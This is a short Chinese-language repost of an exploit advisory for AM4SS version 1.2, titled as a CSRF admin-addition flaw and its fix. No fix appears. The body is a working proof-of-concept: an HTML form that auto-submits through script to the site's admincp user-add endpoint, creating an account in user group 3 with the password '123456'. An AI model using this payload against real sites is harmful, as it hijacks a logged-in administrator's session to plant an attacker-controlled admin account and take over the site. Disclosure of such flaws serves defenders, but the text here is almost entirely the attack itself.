AM4SS 1.2 CSRF添加管理员缺陷及修复 - 网站安全 -

标题   :  AM4SS Version 1.2  - CSRF add Admin  下载地址: http://am4ss.org/am4ss.tar.gz                   

影响版本 : 1.2  : by red virus >>> c3o@w.cn

#Homepage : www.alm3refh.com   www.2cto.com

<html> 

<form  name="r3dvirus" action=" http://www.2cto.com /am4ss/admincp/users.php?do=add" method="post"> 

<input value="egypt"  name="userfullname" type="text" />                                   

<input value="123456"   name="password" type="text" />                                     

<input value=" c3o@w.cn "  name="useremail" type="text" />                           

<input value="EG"  name="country" type="text" /> 

<input value="3"  name="usergroup" type="text" /> 

<input value="save"  name="do" type="text" />                                                              

</form> 

<script>document.r3dvirus.submit();</script> 

</ html > 

  

查看更多关于AM4SS 1.2 CSRF添加管理员缺陷及修复 - 网站安全 -的详细内容...